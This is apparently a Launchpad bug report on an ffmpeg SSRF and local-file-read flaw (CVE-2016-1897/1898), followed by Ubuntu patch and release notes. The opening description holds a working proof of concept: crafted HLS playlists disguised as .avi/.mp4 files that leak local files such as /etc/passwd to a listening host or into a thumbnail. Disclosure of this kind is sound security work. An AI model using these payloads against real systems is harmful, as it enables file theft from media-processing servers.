ffmpeg allows Server-Side Request Forgery attack

Bug #1533367 reported by Filipp Frizzy on 2016-01-12
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
ffmpeg (Ubuntu)
Medium
Unassigned
Vivid
Medium
Unassigned
Wily
Medium
Unassigned
Xenial
Medium
Unassigned

Bug Description

There is a russian blog post about SSRF and local file read with ffmpeg:
http://habrahabr.ru/company/mailru/blog/274855/

One of variants:
$ cat /tmp/test.m3u8
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://localhost:8080?

(Last line - http://* without \n)

$ cat /tmp/test.avi
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:file:///tmp/test.m3u8|file:///tmp/test
#EXT-X-ENDLIST

$ cat /tmp/test
qwerty
123456

Open test.avi with smplayer or even kde baloo:

$ nc -v -l 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 47636)
GET ?qwerty HTTP/1.1
User-Agent: Lavf/56.1.0
Accept: */*
Range: bytes=0-
Connection: close
Host: localhost:8080
Icy-MetaData: 1

Localhost and local test.m3u8 can be changed to remote server.
File extension does not matter.

There is another attack with tumbmails:
$ cat header.y4m
YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
FRAME

$ cat video.mp4
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://example.org/header.y4m|file:///etc/passwd
#EXT-X-ENDLIST

$ ffmpeg -i video.mp4 thumbnail.png
$ ffmpeg -i thumbnail.png out.y4m
$ cat out.y4m
YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
FRAME
# $FreeBSD: release/10.0.0/etc/master.passwd 256366
,! 2013-10-12 06:08:18Z rpaulo $
#
root:*:0:0:Charlie &:/root:/usr/local/bin/zsh
toor:*:0:0:Bourne-again Superuser:/root:

CVE References

Filipp Frizzy (filipp-s-frizzy) wrote :

For read full file just switch from 'concat' to 'subfile' as I understood.

affects: ubuntu → ffmpeg (Ubuntu)
Marc Deslauriers (mdeslaur) wrote :

Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

information type: Private Security → Public Security
Changed in ffmpeg (Ubuntu):
status: New → Incomplete

CVE-2016-1897 (concat) and CVE-2016-1898 (subfile) were assigned to this bug, which (among other potentially security relevant issues) is fixed in FFmpeg 2.7.5 (the lines below starting with avformat/hls refer to this bug).

Attached is a debdiff. (git repo is at [1])

Testing performed (in a wily chroot):
 * build including test suite works
 * installation works
 * upgrade works
 * autopkgtests pass

From the upstream Changelog:

version 2.7.5
- configure: bump copyright year to 2016
- avformat/hls: Even stricter URL checks
- avformat/hls: More strict url checks
- swscale/utils: Detect and skip unneeded sws_setColorspaceDetails() calls
- swscale/yuv2rgb: Increase YUV2RGB table headroom
- swscale/yuv2rgb: Factor YUVRGB_TABLE_LUMA_HEADROOM out
- avformat/hls: forbid all protocols except http(s) & file
- avformat/aviobuf: Fix end check in put_str16()
- avformat/asfenc: Check pts
- avcodec/mpeg4video: Check time_incr
- avcodec/wavpackenc: Check the number of channels
- avcodec/wavpackenc: Headers are per channel
- avcodec/aacdec_template: Check id_map
- avcodec/dvdec: Fix "left shift of negative value -254"
- avcodec/mjpegdec: Fix negative shift
- avcodec/mss2: Check for repeat overflow
- avformat: Add integer fps from 31 to 60 to get_std_framerate()
- avcodec/mpegvideo_enc: Clip bits_per_raw_sample within valid range
- avfilter/vf_scale: set proper out frame color range
- avcodec/motion_est: Fix mv_penalty table size
- avcodec/h264_slice: Fix integer overflow in implicit weight computation
- swscale/utils: Use normal bilinear scaler if fast cannot be used due to tiny dimensions
- avcodec/put_bits: Always check buffer end before writing
- mjpegdec: extend check for incompatible values of s->rgb and s->ls
- swscale/utils: Fix intermediate format for cascaded alpha downscaling
- x86/float_dsp: zero extend offset from ff_scalarproduct_float_sse
- avfilter/vf_zoompan: do not free frame we pushed to lavfi

1: https://anonscm.debian.org/cgit/collab-maint/ffmpeg.git/log/?h=wily

Changed in ffmpeg (Ubuntu):
status: Incomplete → Confirmed
Changed in ffmpeg (Ubuntu):
importance: Undecided → Medium
Changed in ffmpeg (Ubuntu Vivid):
status: New → Confirmed
Changed in ffmpeg (Ubuntu Wily):
status: New → Confirmed
Changed in ffmpeg (Ubuntu Vivid):
importance: Undecided → Medium
Changed in ffmpeg (Ubuntu Wily):
importance: Undecided → Medium
Marc Deslauriers (mdeslaur) wrote :

ACK on the debdiff in comment #3. Packages are building now and will be released as a security update today. Thanks!

Filipp Frizzy (filipp-s-frizzy) wrote :

Thank you, guys
Is it also fixed another packages like Mplayer or KDE Baloo?

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ffmpeg - 7:2.7.5-0ubuntu0.15.10.1

---------------
ffmpeg (7:2.7.5-0ubuntu0.15.10.1) wily-security; urgency=medium

  * Import new upstream bugfix release 2.7.5.
     - Fixes CVE-2016-1897 and CVE-2016-1898. (LP: #1533367)

 -- Andreas Cadhalpun <email address hidden> Fri, 15 Jan 2016 21:05:04 +0100

Changed in ffmpeg (Ubuntu Wily):
status: Confirmed → Fix Released
Download full text (3.2 KiB)

Filipp, if an issue is fixed in libavformat it doesn't affect programs using this dynamic library (like mplayer) anymore, once they have been restarted after libavformat has been upgraded.

To fix this issue in xenial, 2.8.5-1 needs to be merged from Debian/unstable.

Attached is a debdiff for vivid. (git repo is at [1])

Testing performed (in a vivid chroot):
 * build including test suite works
 * installation works
 * upgrade works
 * no regression in the autopkgtests from 2.8.5-1

From the upstream Changelog:

version 2.5.10
- configure: bump copyright year to 2016
- avformat/hls: Even stricter URL checks
- avformat/hls: More strict url checks
- swscale/utils: Detect and skip unneeded sws_setColorspaceDetails() calls
- swscale/yuv2rgb: Increase YUV2RGB table headroom
- swscale/yuv2rgb: Factor YUVRGB_TABLE_LUMA_HEADROOM out
- avformat/hls: forbid all protocols except http(s) & file
- avformat/aviobuf: Fix end check in put_str16()
- avformat/asfenc: Check pts
- avcodec/mpeg4video: Check time_incr
- avcodec/wavpackenc: Check the number of channels
- avcodec/wavpackenc: Headers are per channel
- avcodec/dvdec: Fix "left shift of negative value -254"
- avcodec/mjpegdec: Fix negative shift
- avcodec/mss2: Check for repeat overflow
- avformat: Add integer fps from 31 to 60 to get_std_framerate()
- avcodec/mpegvideo_enc: Clip bits_per_raw_sample within valid range
- avfilter/vf_scale: set proper out frame color range
- avcodec/motion_est: Fix mv_penalty table size
- avcodec/h264_slice: Fix integer overflow in implicit weight computation
- swscale/utils: Use normal bilinear scaler if fast cannot be used due to tiny dimensions
- avcodec/put_bits: Always check buffer end before writing
- mjpegdec: extend check for incompatible values of s->rgb and s->ls
- swscale/utils: Fix intermediate format for cascaded alpha downscaling
- avcodec/h264_refs: Fix long_idx check
- avfilter/vf_mpdecimate: Add missing emms_c()
- avformat/mxfenc: Do not crash if there is no packet in the first stream
- avformat/utils: estimate_timings_from_pts - increase retry counter, fixes invalid duration for ts files with hevc codec
- avformat/matroskaenc: Check codecdelay before use
- avutil/mathematics: Fix division by 0
- x86/float_dsp: zero extend offset from ff_scalarproduct_float_sse
- avcodec/mpeg4videodec: also for empty partitioned slices
- nuv: sanitize negative fps rate
- rawdec: only exempt BIT0 with need_copy from buffer sanity check
- mlvdec: check that index_entries exist
- nutdec: reject negative value_len in read_sm_data
- xwddec: prevent overflow of lsize * avctx->height
- nutdec: only copy the header if it exists
- exr: fix out of bounds read in get_code
- on2avc: limit number of bits to 30 in get_egolomb
- sonic: make sure num_taps * channels is not larger than frame_size
- opus_silk: fix typo causing overflow in silk_stabilize_lsf
- ffm: reject invalid codec_id and codec_type
- aaccoder: prevent crash of anmr coder
- ffmdec: reject zero-sized chunks
- swscale/x86/rgb2rgb_template: Fallback to mmx in interleaveBytes() if the alignment is insufficient for SSE*
- swscale/x86/rgb2rgb_template: Do not crash on misaligend stride

1: https://anonscm.debian.org/cgit/c...

Read more...

Marc Deslauriers (mdeslaur) wrote :

ACK on the debdiff in comment #7. Package is building now and will be released as a security update today. Thanks!

Changed in ffmpeg (Ubuntu Vivid):
status: Confirmed → Fix Committed
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ffmpeg - 7:2.5.10-0ubuntu0.15.04.1

---------------
ffmpeg (7:2.5.10-0ubuntu0.15.04.1) vivid-security; urgency=medium

  * Import new upstream bugfix release 2.5.10.
     - Fixes CVE-2016-1897 and CVE-2016-1898. (LP: #1533367)

 -- Andreas Cadhalpun <email address hidden> Tue, 19 Jan 2016 20:24:46 +0100

Changed in ffmpeg (Ubuntu Vivid):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ffmpeg - 7:2.8.6-1ubuntu1

---------------
ffmpeg (7:2.8.6-1ubuntu1) xenial; urgency=low

  * Merge from Debian unstable. Remaining changes:
    - Compile with -O2 rather than -O3 on s390x, to work around
      https://bugs.launchpad.net/bugs/1526324.
  * Should fix LP: #1533367

ffmpeg (7:2.8.6-1) unstable; urgency=medium

  * Import new upstream bugfix release 2.8.6.
  * Update Standards-Version to 3.9.7.
     - Move documentatation from /u/s/d/ffmpeg-doc/ to /u/s/d/ffmpeg/.
  * Use https for the Vcs-Git link.

ffmpeg (7:2.8.5-1) unstable; urgency=medium

  * Import new upstream bugfix release 2.8.5.
     - Fixes CVE-2016-1897 and CVE-2016-1898.
  * Update doc-make-apidoc-output-independent-of-SRC_PATH.patch.
  * Add patch to make out-of-tree builds bit-identical to in-tree-builds.
  * Enable the now available opencv and frei0r on mips64el.
  * Fix altivec-extra compile time optimization.
  * Update copyright year for the debian files.
  * Change priority of libavcodec*-extra* to extra.

 -- Iain Lane <email address hidden> Thu, 25 Feb 2016 17:48:20 +0000

Changed in ffmpeg (Ubuntu Xenial):
status: Confirmed → Fix Released
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers